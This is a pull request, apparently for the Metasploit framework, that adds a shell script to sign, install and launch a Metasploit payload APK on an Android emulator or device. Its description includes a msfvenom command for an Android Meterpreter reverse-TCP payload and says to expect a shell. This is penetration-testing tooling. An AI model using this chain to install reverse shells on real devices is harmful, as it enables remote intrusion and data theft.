### PR TITLE
Add MSF APK installer

### DIFF
--- a/tools/install_msf_apk.sh
+++ b/tools/install_msf_apk.sh
@@ -1,0 +1,36 @@
+#!/usr/bin/env bash
+
+# This script allows you install your msf payload apk to your Android emulator.
+# Make sure you have Java and Android SDK.
+
+apk_path=$1
+
+
+if ! [ -x "$(command -v adb)" ]
+then
+  echo "Android SDK platform-tools not included in \$PATH."
+  exit
+fi
+
+if ! [ -x "$(command -v jarsigner)" ]
+then
+  echo "jarsigner is missing."
+  exit
+fi
+
+if [ -z "$apk_path" ]
+then
+  echo "APK path is required."
+  exit
+fi
+
+if ! [ -a "$apk_path" ]
+then
+  echo "APK not found."
+  exit
+fi
+
+jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA $apk_path androiddebugkey
+adb uninstall com.metasploit.stage
+adb install -r $apk_path
+adb shell am start -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity

--- a/tools/install_msf_apk.sh
+++ b/tools/install_msf_apk.sh
@@ -18,6 +18,12 @@ then
   exit
 fi
 
+if ! [ -e "$HOME/.android/debug.keystore" ]
+then
+  echo "Missing ~/.android/debug.keystore"
+  exit
+fi
+
 if [ -z "$apk_path" ]
 then
   echo "APK path is required."


### PR DESCRIPTION
You can use this script to install your msf apk to your android device/emulator.

To test, make sure to:
- [x] `./msfvenom -p android/meterpreter/reverse_tcp lhost=your_ip lport=lport -o android.apk`
- [x] Start a multi-handler for android/meterpreter/reverse_tcp
- [x] start an [emulator](http://developer.android.com/tools/devices/emulator.html)
- [x] Run this installer script: `./install_msf_apk.sh [location to apk]`
- [x] You should see that the apk is installed (as MainActivity), and msfconsole should get a shell, too.
